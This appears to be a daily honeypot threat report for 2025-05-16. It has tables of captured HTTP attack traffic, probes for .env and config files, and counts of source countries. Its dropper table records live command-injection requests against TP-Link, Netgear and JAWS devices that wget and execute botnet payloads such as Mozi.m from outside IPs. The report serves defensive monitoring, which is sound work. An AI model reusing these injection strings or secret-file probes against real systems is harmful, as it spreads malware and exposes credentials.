Daily Report: 2025-05-16#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).
There are 258 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1328 requests were recorded during the day, originating from 4 different countries, with a peak of 402 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Germany |
US | Germany |
US | Germany |
SG | Germany |
US | Germany |
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
141.98.11.137 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1 |
123.129.130.253 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.129.130.253:53205/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
196.189.10.187 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1 |
175.107.1.188 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.107.1.188:46194/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
85 | 2 | GET /.env-git.log HTTP/1.1 |
87 | 2 | GET /.env-api.env HTTP/1.1 |
96 | 2 | GET /.env-build.log HTTP/1.1 |
98 | 2 | GET /.env-stage.log HTTP/1.1 |
100 | 2 | GET /.env-event.log HTTP/1.1 |
103 | 1 | GET /.env-ci.conf HTTP/1.1 |
104 | 1 | GET /.env-cd.conf HTTP/1.1 |
105 | 1 | GET /.env-dev.conf HTTP/1.1 |
106 | 1 | GET /.env-activity.log HTTP/1.1 |
107 | 1 | GET /.env-prod.conf HTTP/1.1 |
108 | 1 | GET /.env-staging.conf HTTP/1.1 |
111 | 1 | POST /api/user/binLookup?time=1747366682156991381 HTTP/1.1 |
112 | 1 | GET /api/bin/440393?time=1747366680682615575 HTTP/1.1 |
117 | 1 | GET /config/index?time=1747365459919719017 HTTP/1.1 |
120 | 1 | GET /api/bin/440393?time=1747366519131259110 HTTP/1.1 |
121 | 1 | POST /api/user/binLookup?time=1747366521307028752 HTTP/1.1 |
127 | 1 | GET /.env-trace.log HTTP/1.1 |
128 | 1 | GET /config/index?time=1747393665627164394 HTTP/1.1 |
129 | 1 | GET /api/bin/440393?time=1747394733383935843 HTTP/1.1 |
130 | 1 | POST /api/user/binLookup?time=1747394735634417140 HTTP/1.1 |
139 | 1 | GET /.env-notification.conf HTTP/1.1 |
145 | 1 | GET /config/index?time=1747365354445515770 HTTP/1.1 |
151 | 1 | {D79E94C5-70F0-46BD-965B-E17497CCB598} |
155 | 1 | GET /.env-gcs.log HTTP/1.1 |
156 | 1 | GET /.env-azure.log HTTP/1.1 |
158 | 1 | GET /.env-aws.log HTTP/1.1 |
159 | 1 | GET /.env-gitlab.log HTTP/1.1 |
160 | 1 | GET /.env-github.log HTTP/1.1 |
161 | 1 | GET /.env-bitbucket.log HTTP/1.1 |
162 | 1 | GET /.env-k8s.log HTTP/1.1 |
163 | 1 | GET /.env-docker.log HTTP/1.1 |
164 | 1 | GET /.env-compose.log HTTP/1.1 |
165 | 1 | GET /.env-container.log HTTP/1.1 |
166 | 1 | GET /.env-orchestration.log HTTP/1.1 |
167 | 1 | GET /.env-pod.log HTTP/1.1 |
168 | 1 | GET /.env-node.log HTTP/1.1 |
169 | 1 | GET /.env-mongodb.conf HTTP/1.1 |
170 | 1 | GET /.env-ingress.log HTTP/1.1 |
171 | 1 | GET /.env-deployment.log HTTP/1.1 |
172 | 1 | GET /.env-rollout.log HTTP/1.1 |
173 | 1 | GET /.env-scaling.log HTTP/1.1 |
174 | 1 | GET /.env-proxy.log HTTP/1.1 |
175 | 1 | GET /.env-gateway.log HTTP/1.1 |
176 | 1 | GET /.env-api-gateway.log HTTP/1.1 |
177 | 1 | GET /.env-nginx.conf HTTP/1.1 |
178 | 1 | GET /.env-firewall.conf HTTP/1.1 |
179 | 1 | GET /.env-apache.conf HTTP/1.1 |
180 | 1 | GET /.env-tls.conf HTTP/1.1 |
181 | 1 | GET /.env-ssl.conf HTTP/1.1 |
182 | 1 | GET /.env-webserver.conf HTTP/1.1 |
183 | 1 | GET /.env-server.conf HTTP/1.1 |
184 | 1 | GET /.env-iis.conf HTTP/1.1 |
185 | 1 | GET /.env-service.log HTTP/1.1 |
186 | 1 | GET /.env-alerting.conf HTTP/1.1 |
187 | 1 | GET /.env-monitoring.conf HTTP/1.1 |
188 | 1 | GET /.env-logging.conf HTTP/1.1 |
189 | 1 | GET /.env-storage.conf HTTP/1.1 |
190 | 1 | GET /.env-memcached.conf HTTP/1.1 |
191 | 1 | GET /.env-redis.conf HTTP/1.1 |
192 | 1 | GET /.env-audit.log HTTP/1.1 |
193 | 1 | GET /.env-postgres.conf HTTP/1.1 |
194 | 1 | GET /.env-mysql.conf HTTP/1.1 |
195 | 1 | GET /.env-db.conf HTTP/1.1 |
196 | 1 | GET /.env-session.conf HTTP/1.1 |
197 | 1 | GET /.env-cors.conf HTTP/1.1 |
198 | 1 | GET /.env-auth.conf HTTP/1.1 |
199 | 1 | GET /.env-security.conf HTTP/1.1 |
200 | 1 | GET /.env-trail.log HTTP/1.1 |
201 | 1 | GET /.env-s3.log HTTP/1.1 |
202 | 1 | GET /.env-xml.log HTTP/1.1 |
203 | 1 | GET /.env-html.log HTTP/1.1 |
204 | 1 | GET /.env-http.log HTTP/1.1 |
205 | 1 | GET /.env-request.log HTTP/1.1 |
206 | 1 | GET /.env-response.log HTTP/1.1 |
207 | 1 | GET /.env-breach.log HTTP/1.1 |
208 | 1 | GET /.env-incident.log HTTP/1.1 |
209 | 1 | GET /.env-alert.log HTTP/1.1 |
210 | 1 | GET /.env-notice.log HTTP/1.1 |
211 | 1 | GET /.env-warning.log HTTP/1.1 |
212 | 1 | GET /.env-critical.log HTTP/1.1 |
213 | 1 | GET /.env-info.log HTTP/1.1 |
214 | 1 | GET /.env-diagnostics.log HTTP/1.1 |
215 | 1 | GET /.env-integration.log HTTP/1.1 |
216 | 1 | GET /.env-cloud.log HTTP/1.1 |
217 | 1 | GET /.env-json.log HTTP/1.1 |
232 | 1 | GET /.env-access.log HTTP/1.1 |
344 | 1 | GET /config.backup HTTP/1.1 |
354 | 1 | GET /.env_hidden HTTP/1.1 |
359 | 1 | GET /.env.5 HTTP/1.1 |
360 | 1 | GET /.env.4 HTTP/1.1 |
361 | 1 | GET /.env.3 HTTP/1.1 |
367 | 1 | CONNECT google.com:443 HTTP/1.0 |
374 | 1 | GET /.env.back HTTP/1.1 |
375 | 1 | GET /.env-report.env HTTP/1.1 |
376 | 1 | GET /.env-sitemap.env HTTP/1.1 |
377 | 1 | GET /.env-doc.env HTTP/1.1 |
378 | 1 | GET /.env-meta.env HTTP/1.1 |
379 | 1 | GET /.env-info.env HTTP/1.1 |
380 | 1 | GET /.env-scan.env HTTP/1.1 |
381 | 1 | GET /.env-properties.env HTTP/1.1 |
382 | 1 | GET /.env-variables.env HTTP/1.1 |
383 | 1 | GET /.env-vars.env HTTP/1.1 |
384 | 1 | GET /.env-params.env HTTP/1.1 |
385 | 1 | GET /.env-logs.env HTTP/1.1 |
386 | 1 | GET /.env-debug.env HTTP/1.1 |
387 | 1 | GET /.env-cache.env HTTP/1.1 |
388 | 1 | GET /.env-session.env HTTP/1.1 |
389 | 1 | GET /.env-firewall.env HTTP/1.1 |
390 | 1 | GET /config.1.php HTTP/1.1 |
391 | 1 | GET /.env-creds.env HTTP/1.1 |
392 | 1 | GET /.env-keys.env HTTP/1.1 |
393 | 1 | GET /.env-token.env HTTP/1.1 |
394 | 1 | GET /.env-oauth.env HTTP/1.1 |
395 | 1 | GET /.env-auth.env HTTP/1.1 |
396 | 1 | GET /.env-admin.env HTTP/1.1 |
397 | 1 | GET /.env-user.env HTTP/1.1 |
398 | 1 | GET /.env-cloud.env HTTP/1.1 |
399 | 1 | GET /wp-config.php.old/.env-gcs.env HTTP/1.1 |
402 | 1 | GET /config.staging.php HTTP/1.1 |
403 | 1 | GET /config_dev.php HTTP/1.1 |
404 | 1 | GET /config.tmp HTTP/1.1 |
405 | 1 | GET /config.save HTTP/1.1 |
406 | 1 | GET /.env-password.env HTTP/1.1 |
438 | 1 | JRMI\x00\x02K |
441 | 1 | POST /api/user/binLookup?time=1747392685581485130 HTTP/1.1 |
442 | 1 | GET /api/bin/440393?time=1747392684482723971 HTTP/1.1 |
443 | 1 | GET /config/index?time=1747392596164519114 HTTP/1.1 |
456 | 1 | GET /SaAh HTTP/1.1 |
457 | 1 | GET /yT6Y HTTP/1.1 |
458 | 1 | GET /config/index?time=1747364091610731499 HTTP/1.1 |
459 | 1 | POST /api/user/binLookup?time=1747364066490399546 HTTP/1.1 |
460 | 1 | GET /api/bin/440393?time=1747364065161518296 HTTP/1.1 |
470 | 1 | GET /.env-database.log HTTP/1.1 |
471 | 1 | GET /.env-admin.log HTTP/1.1 |
472 | 1 | GET /.env-user.log HTTP/1.1 |
473 | 1 | GET /.env-client.log HTTP/1.1 |
474 | 1 | GET /.env-api.log HTTP/1.1 |
475 | 1 | GET /.env-session.log HTTP/1.1 |
476 | 1 | GET /.env-cert.log HTTP/1.1 |
477 | 1 | GET /.env-ssl.log HTTP/1.1 |
478 | 1 | GET /.env-security.log HTTP/1.1 |
479 | 1 | GET /.env-monitor.log HTTP/1.1 |
480 | 1 | GET /.env-web.log HTTP/1.1 |
481 | 1 | GET /.env-server.log HTTP/1.1 |
482 | 1 | GET /.env-iis.log HTTP/1.1 |
483 | 1 | GET /.env-apache.log HTTP/1.1 |
484 | 1 | GET /.env-check.env HTTP/1.1 |
485 | 1 | GET /.env-php.log HTTP/1.1 |
486 | 1 | GET /.env-stack.log HTTP/1.1 |
487 | 1 | GET /.env-system.log HTTP/1.1 |
488 | 1 | GET /.env-warnings.log HTTP/1.1 |
489 | 1 | GET /.env-debug.log HTTP/1.1 |
490 | 1 | GET /.env-error.log HTTP/1.1 |
491 | 1 | GET /.env-smtp.log HTTP/1.1 |
492 | 1 | GET /.env-token.log HTTP/1.1 |
493 | 1 | GET /.env-login.log HTTP/1.1 |
494 | 1 | GET /.env-auth.log HTTP/1.1 |
495 | 1 | GET /.env-runner.log HTTP/1.1 |
496 | 1 | GET /.env-job.log HTTP/1.1 |
497 | 1 | GET /.env-worker.log HTTP/1.1 |
498 | 1 | GET /.env-cron.log HTTP/1.1 |
499 | 1 | GET /.env-release.log HTTP/1.1 |
500 | 1 | GET /.env-nginx.log HTTP/1.1 |
501 | 1 | GET /.env-hacking.log HTTP/1.1 |
502 | 1 | GET /.env-exploit.log HTTP/1.1 |
503 | 1 | GET /.env-rfi.log HTTP/1.1 |
504 | 1 | GET /.env-lfi.log HTTP/1.1 |
505 | 1 | GET /.env-ssrf.log HTTP/1.1 |
506 | 1 | GET /.env-sqli.log HTTP/1.1 |
507 | 1 | GET /.env-xss.log HTTP/1.1 |
508 | 1 | GET /.env-csrf.log HTTP/1.1 |
509 | 1 | GET /.env-cors.log HTTP/1.1 |
510 | 1 | GET /.env-acl.log HTTP/1.1 |
511 | 1 | GET /.env-ids.log HTTP/1.1 |
512 | 1 | GET /.env-rules.log HTTP/1.1 |
513 | 1 | GET /.env-firewall.log HTTP/1.1 |
514 | 1 | GET /.env-waf.log HTTP/1.1 |
515 | 1 | GET /.env-checks.log HTTP/1.1 |
516 | 1 | GET /.env-db.log HTTP/1.1 |
517 | 1 | GET /.env-observability.log HTTP/1.1 |
518 | 1 | GET /.env-telemetry.log HTTP/1.1 |
519 | 1 | GET /.env-metrics.log HTTP/1.1 |
520 | 1 | GET /.env-cache.log HTTP/1.1 |
521 | 1 | GET /.env-tokens.log HTTP/1.1 |
522 | 1 | GET /.env-authorization.log HTTP/1.1 |
523 | 1 | GET /.env-authentication.log HTTP/1.1 |
524 | 1 | GET /.env-password.log HTTP/1.1 |
525 | 1 | GET /.env-secret.log HTTP/1.1 |
526 | 1 | GET /.env-vault.log HTTP/1.1 |
527 | 1 | GET /.env-vcs.log HTTP/1.1 |
528 | 1 | GET /.env-prod.log HTTP/1.1 |
529 | 1 | GET /.env-dev.log HTTP/1.1 |
530 | 1 | GET /.env-cicd.log HTTP/1.1 |
531 | 1 | GET /.env-storage.log HTTP/1.1 |
532 | 1 | GET /.env-health.log HTTP/1.1 |
533 | 1 | GET /.env-export.env HTTP/1.1 |
534 | 1 | GET /.env-archive.env HTTP/1.1 |
535 | 1 | GET /.env-snapshot.env HTTP/1.1 |
536 | 1 | GET /.env-dump.env HTTP/1.1 |
537 | 1 | GET /.env-template.env HTTP/1.1 |
538 | 1 | GET /.env-example.env HTTP/1.1 |
539 | 1 | GET /.env-test.env HTTP/1.1 |
540 | 1 | GET /.env-sample.env HTTP/1.1 |
541 | 1 | GET /.env-data.env HTTP/1.1 |
542 | 1 | GET /.env-response.env HTTP/1.1 |
543 | 1 | GET /.env-request.env HTTP/1.1 |
544 | 1 | GET /.env-get.env HTTP/1.1 |
545 | 1 | GET /.env-post.env HTTP/1.1 |
546 | 1 | GET /.env-fetch.env HTTP/1.1 |
547 | 1 | GET /.env-deploy.log HTTP/1.1 |
548 | 1 | GET /.env-header.env HTTP/1.1 |
549 | 1 | GET /.env-trace.env HTTP/1.1 |
550 | 1 | GET /.env-whois.env HTTP/1.1 |
551 | 1 | GET /.env-location.env HTTP/1.1 |
552 | 1 | GET /.env-country.env HTTP/1.1 |
553 | 1 | GET /.env-ip.env HTTP/1.1 |
554 | 1 | GET /.env-iplist.env HTTP/1.1 |
555 | 1 | GET /.env-top1000.env HTTP/1.1 |
556 | 1 | GET /.env-top500.env HTTP/1.1 |
557 | 1 | GET /.env-top100.env HTTP/1.1 |
558 | 1 | GET /.env-top.env HTTP/1.1 |
559 | 1 | GET /.env-hitlist.env HTTP/1.1 |
560 | 1 | GET /.env-hits.env HTTP/1.1 |
561 | 1 | GET /.env-ids.env HTTP/1.1 |
562 | 1 | GET /.env-results.env HTTP/1.1 |
563 | 1 | GET /.env-curl.env HTTP/1.1 |
564 | 1 | GET /.env-pipeline.log HTTP/1.1 |
565 | 1 | GET /.env-ci.log HTTP/1.1 |
566 | 1 | GET /.env-builder.js HTTP/1.1 |
567 | 1 | GET /.env-builder.env HTTP/1.1 |
568 | 1 | GET /.env-devconsole.env HTTP/1.1 |
569 | 1 | GET /.env-devtools.env HTTP/1.1 |
570 | 1 | GET /.env-dev.env HTTP/1.1 |
571 | 1 | GET /.env-ui.env HTTP/1.1 |
572 | 1 | GET /.env-ext.env HTTP/1.1 |
573 | 1 | GET /.env-internal.env HTTP/1.1 |
574 | 1 | GET /.env-front.env HTTP/1.1 |
575 | 1 | GET /.env-back.env HTTP/1.1 |
576 | 1 | GET /.env-service.env HTTP/1.1 |
577 | 1 | GET /.env-micro.env HTTP/1.1 |
578 | 1 | GET /.env-webapp.env HTTP/1.1 |
579 | 1 | GET /.env-import.env HTTP/1.1 |
580 | 1 | GET /.env-interface.env HTTP/1.1 |
581 | 1 | GET /.env-gui.env HTTP/1.1 |
582 | 1 | GET /.env-center.env HTTP/1.1 |
583 | 1 | GET /.env-control.env HTTP/1.1 |
584 | 1 | GET /.env-portal.env HTTP/1.1 |
585 | 1 | GET /.env-console.env HTTP/1.1 |
586 | 1 | GET /.env-dashboard.env HTTP/1.1 |
587 | 1 | GET /.env-backend.env HTTP/1.1 |
588 | 1 | GET /.env-admin-panel.env HTTP/1.1 |
589 | 1 | GET /.env-agent.env HTTP/1.1 |
590 | 1 | GET /.env-crawler.env HTTP/1.1 |
591 | 1 | GET /.env-spider.env HTTP/1.1 |
592 | 1 | GET /.env-probe.env HTTP/1.1 |
593 | 1 | GET /.env-download.env HTTP/1.1 |
594 | 1 | GET /.env-upload.env HTTP/1.1 |
595 | 1 | GET /.env-web.env HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 402 | GB |
1 | 327 | US |
2 | 230 | BG |
3 | 86 | PL |
4 | 61 | DE |
5 | 37 | SC |
6 | 27 | NL |
7 | 24 | JP |
8 | 22 | CN |
9 | 15 | CA |
10 | 12 | AZ |
11 | 7 | RO |
12 | 7 | IN |
13 | 5 | FR |
14 | 5 | HK |
15 | 5 | GH |
16 | 5 | ZA |
17 | 5 | ES |
18 | 5 | AO |
19 | 4 | IL |
20 | 4 | KR |
21 | 4 | LT |
22 | 3 | IR |
23 | 3 | TR |
24 | 3 | BR |
25 | 3 | SG |
26 | 3 | RU |
27 | 2 | VN |
28 | 2 | AR |
29 | 2 | UA |
30 | 1 | ET |
31 | 1 | PK |
32 | 1 | IT |
33 | 1 | BE |
34 | 1 | HU |
35 | 1 | PE |
36 | 1 | IQ |
37 | 1 | CZ |